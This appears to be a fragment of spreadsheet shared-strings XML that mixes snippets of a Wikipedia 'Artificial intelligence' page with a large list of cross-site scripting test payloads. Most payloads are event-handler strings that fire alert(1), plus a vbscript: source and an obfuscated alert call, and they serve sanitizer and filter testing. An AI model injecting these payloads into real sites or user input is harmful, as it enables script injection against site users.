    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.mckinsey.com/business-functions/mckinsey-analytics/our-insights/ask-the-ai-experts-whats-driving-todays-progress-in-ai"&gt;"Ask the AI experts: What's driving today's progress in AI?" &lt;/a&gt;. &lt;i&gt;McKinsey &amp;amp; Company &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;13 April </t>
  </si>
  <si>
    <t>&lt;hr onbeforecut="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Remote+monitoring+of+high-risk+patients+using+artificial+intelligence&amp;amp;rft.date=1994-10-18&amp;amp;rft_id=https%3A%2F%2Fwww.google.com%2Fpatents%2FUS5357427&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;strong id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="ca-view" class="collapsible selected"&gt;&lt;a href="/wiki/Artificial_intelligence"&gt;Read &lt;/a&gt; &lt;/li&gt;&lt;li id="ca-edit" class="collapsible"&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit" title="Edit this page [e]" accesskey="e"&gt;Edit &lt;/a&gt; &lt;/li&gt;&lt;li id="ca-history" class="collapsible"&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=history" title="Past revisions of this page [h]" accesskey="h"&gt;View history &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;param onmouseover="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;abbr id=x tabindex=1 onfocus=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/0.20/"&gt;0.20&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;link href=validstyles.css rel=stylesheet onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;u id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/u&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;font id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onmousemove="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;th onkeydown="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Climber_(BEAM)" class="mw-redirect" title="Climber (BEAM)"&gt;Climbing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;i ondragover=alert(1) contenteditable&gt;drop here&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;sup draggable="true" ondragstart="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;rp onmousedown="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;aside id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-48"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-48"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;bgsound id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dfn ondragover=alert(1) contenteditable&gt;drop here&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Semantic_reasoner" title="Semantic reasoner"&gt;Semantic reasoner &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;cite onpointermove=alert(1)&gt;XSS&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;option onpointermove=alert(1)&gt;XSS&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Electric_unicycle" title="Electric unicycle"&gt;Electric unicycle &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;del ondragover=alert(1) contenteditable&gt;drop here&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;video id=x tabindex=1 onactivate=alert(1)&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;code onmouseover="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onmouseenter="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;title onblur=alert(1) tabindex=1 id=x&gt;&lt;/title&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;input onmousemove="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;form id=x tabindex=1 onactivate=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;aside id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;template ondblclick="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;listing draggable="true" ondragstart="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;pre onpaste="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;sub onmouseout="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/AI_box" title="AI box"&gt;AI box &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;th onmouseup="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;embed draggable="true" ondrag="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpaste="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;menu onmousedown="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onpointerup=alert(1)&gt;XSS&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;legend style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;thead id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/thead&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;picture&gt;&lt;source srcset="validimage.png"&gt;&lt;img onloadend=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; [&lt;a rel="nofollow" class="external text" href="//arxiv.org/archive/cs.CL"&gt;cs.CL &lt;/a&gt;]. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=preprint&amp;amp;rft.jtitle=arXiv&amp;amp;rft.atitle=Constructing+Long+Short-Term+Memory+based+Deep+Recurrent+Neural+Networks+for+Large+Vocabulary+Speech+Recognition&amp;amp;rft.date=2015&amp;amp;rft_id=info%3Aarxiv%2F1410.4281&amp;amp;rft.aulast=Li&amp;amp;rft.aufirst=Xiangang&amp;amp;rft.au=Wu%2C+Xihong&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;address onbeforecopy="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;th onmousedown="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;rt id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/rt&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">              &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFLucas1961"&gt;Lucas 1961 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;summary onbeforecut="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup draggable="true" ondragenter="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;frameset id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;article style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robert_Kilwardby" title="Robert Kilwardby"&gt;Robert Kilwardby &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onblur=alert(1) tabindex=1 id=x&gt;&lt;/noframes&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;59–93 &lt;/li&gt;</t>
  </si>
  <si>
    <t>Mathematical definitions of intelligence:</t>
  </si>
  <si>
    <t>&lt;tbody onpointerdown=alert(1)&gt;XSS&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onmouseover="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;col ondrop=alert(1) contenteditable&gt;drop here&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;content draggable="true" ondragenter="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;font oncut="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Computer science defines AI research as the study of "&lt;a href="/wiki/Intelligent_agent" title="Intelligent agent"&gt;intelligent agents &lt;/a&gt;": any device that perceives its environment and takes actions that maximize its chance of successfully achieving its goals.&lt;sup id="cite_ref-Definition_of_AI_1-1" class="reference"&gt;&lt;a href="#cite_note-Definition_of_AI-1"&gt;&amp;#91;1&amp;#93; &lt;/a&gt; &lt;/sup&gt; A more elaborate definition characterizes AI as "a system's ability to correctly interpret external data, to learn from such data, and to use those learnings to achieve specific goals and tasks through flexible adaptation."&lt;sup id="cite_ref-61" class="reference"&gt;&lt;a href="#cite_note-61"&gt;&amp;#91;61&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;footer onkeypress="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Feedforward_neural_networks-237"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Feedforward_neural_networks_237-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div onkeypress="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Wikipedia:WikiProject_Philosophy/Mind" title="Wikipedia:WikiProject Philosophy/Mind"&gt;Task Force &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext draggable="true" ondragleave="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;embed src=/ onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;ol onmouseup="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onmouseout="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;a onmouseenter="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"&gt;</t>
  </si>
  <si>
    <t>&lt;nav ondblclick="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Voice+of+America&amp;amp;rft.atitle=Ethical+AI+Learns+Human+Rights+Framework&amp;amp;rft_id=https%3A%2F%2Fwww.voanews.com%2Fepisode%2Fethical-ai-learns-human-rights-framework-4087171&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;summary onmouseleave="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;17, who call the conference "the birth of artificial intelligence." &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;summary id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;em onbeforecut="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;object onkeyup="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;127–133 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;rt id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/rt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;head onkeyup="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onclick="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;input type="submit" name="fulltext" value="Search" title="Search Wikipedia for this text" id="mw-searchButton" class="searchButton mw-fallbackSearchButton"/&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onkeypress="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;legend onpointerenter=alert(1)&gt;XSS&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;small id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, p.&amp;#160;187. </t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;script src="https://assets.readthedocs.org/static/javascript/readthedocs-doc-embed.js"&gt;&lt;/script&gt;  </t>
  </si>
  <si>
    <t>&lt;tbody id=x tabindex=1 onactivate=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;set onpointerleave=alert(1)&gt;XSS&lt;/set&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Auguste_Comte" title="Auguste Comte"&gt;Auguste Comte &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation journal"&gt;Serenko, Alexander (2010). &lt;a rel="nofollow" class="external text" href="http://www.aserenko.com/papers/JOI_Serenko_AI_Journal_Ranking_Published.pdf"&gt;"The development of an AI journal ranking based on the revealed preference approach" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;marquee style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. Its goal is to memorize all the papers necessary to cancer and help predict which combinations of drugs will be most effective for each patient. One project that is being worked on at the moment is fighting &lt;a href="/wiki/Acute_myeloid_leukemia" title="Acute myeloid leukemia"&gt;myeloid leukemia &lt;/a&gt;, a fatal cancer where the treatment has not improved in decades. Another study was reported to have found that artificial intelligence was as good as trained doctors in identifying skin cancers.&lt;sup id="cite_ref-302" class="reference"&gt;&lt;a href="#cite_note-302"&gt;&amp;#91;291&amp;#93; &lt;/a&gt; &lt;/sup&gt; Another study is using artificial intelligence to try to monitor multiple high-risk patients, and this is done by asking each patient numerous questions based on data acquired from live doctor to patient interactions.&lt;sup id="cite_ref-303" class="reference"&gt;&lt;a href="#cite_note-303"&gt;&amp;#91;292&amp;#93; &lt;/a&gt; &lt;/sup&gt; One study was done with transfer learning, the machine performed a diagnosis similarly to a well-trained ophthalmologist, and could generate a decision within 30 seconds on whether or not the patient should be referred for treatment, with more than 95% accuracy.&lt;sup id="cite_ref-304" class="reference"&gt;&lt;a href="#cite_note-304"&gt;&amp;#91;293&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onmousemove="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;data onmouseleave="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;applet style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;nobr draggable="true" ondragend="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;ol onmouseenter="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;blink onmouseup="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Multi-agent_system" title="Multi-agent system"&gt;Multi-agent system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span style="display: inline-block; margin-left: 4px; width: 182px; vertical-align: middle;"&gt;&lt;a href="https://en.wikiquote.org/wiki/Special:Search/Artificial_intelligence" class="extiw" title="q:Special:Search/Artificial intelligence"&gt;Quotations &lt;/a&gt; from Wikiquote </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;param onload=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpointerout=alert(1)&gt;XSS&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Links_to_related_articles" style="font-size:114%;margin:0 4em"&gt;Links to related articles &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" class="navbox-list navbox-odd" style="width:100%;padding:0px;font-size:114%"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-hochreiter1991-264"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-hochreiter1991_264-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;track oncopy="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;html id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/html&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/tfoot&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;15, 940 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Malevolent and friendly AI </t>
  </si>
  <si>
    <t>&lt;multicol ondblclick="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;area onpointerover=alert(1)&gt;XSS&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;rp onkeypress="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;img  src="x:gif" onerror="window['al\u0065rt'](0)"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;ins onpointerleave=alert(1)&gt;XSS&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onbeforepaste="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onkeyup="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;article style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Hasim Sak and Andrew Senior and Francoise Beaufays (2014). Long Short-Term Memory recurrent neural network architectures for large scale acoustic modeling. Proceedings of Interspeech 2014. </t>
  </si>
  <si>
    <t>&lt;figure draggable="true" ondragenter="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;source oncut="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;img onbeforecut="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;input type=image src=validimage.png onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;259–305 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpointerover=alert(1)&gt;XSS&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;rt ondblclick="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onkeyup="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;SVM displaced k-nearest neighbor in the 1990s&lt;sup id="cite_ref-FOOTNOTEDomingos2015188_223-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015188-223"&gt;&amp;#91;216&amp;#93; &lt;/a&gt; &lt;/sup&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Relationship_between_religion_and_science" title="Relationship between religion and science"&gt;Relationship between religion and science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;th style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Outline_of_robotics" title="Outline of robotics"&gt;Outline &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;link onreadystatechange=alert(1) rel=stylesheet href=1&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;tt id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;dt onpointerover=alert(1)&gt;XSS&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpaste="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;label onpointerenter=alert(1)&gt;XSS&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;svg onmouseover="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;td onmouseleave="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;aside oncontextmenu="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;input draggable="true" ondragend="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Chun, Rene (21 September 2017). &lt;a rel="nofollow" class="external text" href="https://www.artsy.net/article/artsy-editorial-hard-painting-made-computer-human"&gt;"It's Getting Hard to Tell If a Painting Was Made by a Computer or a Human" &lt;/a&gt;. &lt;i&gt;Artsy &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;23 July </t>
  </si>
  <si>
    <t>&lt;noscript oncut="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;source onblur=alert(1) tabindex=1 id=x&gt;&lt;/source&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;aside onload=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC='vbscript:msgbox("")'&gt;</t>
  </si>
  <si>
    <t>&lt;address onkeyup="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tfoot style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;legend id=x tabindex=1 onfocus=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpointerover=alert(1)&gt;XSS&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onpointerup=alert(1)&gt;XSS&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;details onbeforepaste="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;img draggable="true" ondragstart="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://futurism.com/artificial-intelligence-experts-fear/amp"&gt;"Five experts share what scares them the most about AI" &lt;/a&gt;. 5 September 2018. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Five+experts+share+what+scares+them+the+most+about+AI&amp;amp;rft.date=2018-09-05&amp;amp;rft_id=https%3A%2F%2Ffuturism.com%2Fartificial-intelligence-experts-fear%2Famp&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; from the original on 9 August 2007. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Robotics+and+Autonomous+Systems&amp;amp;rft.atitle=Elephants+Don%27t+Play+Chess&amp;amp;rft.volume=6&amp;amp;rft.issue=1%E2%80%932&amp;amp;rft.pages=3-15&amp;amp;rft.date=1990&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.588.7539&amp;amp;rft_id=info%3Adoi%2F10.1016%2FS0921-8890%2805%2980025-9&amp;amp;rft.aulast=Brooks&amp;amp;rft.aufirst=Rodney&amp;amp;rft_id=http%3A%2F%2Fpeople.csail.mit.edu%2Fbrooks%2Fpapers%2Felephants.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;xmp style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;tr onmousemove="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onbeforecut="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ins ondragover=alert(1) contenteditable&gt;drop here&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;div id=x tabindex=1 onfocus=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
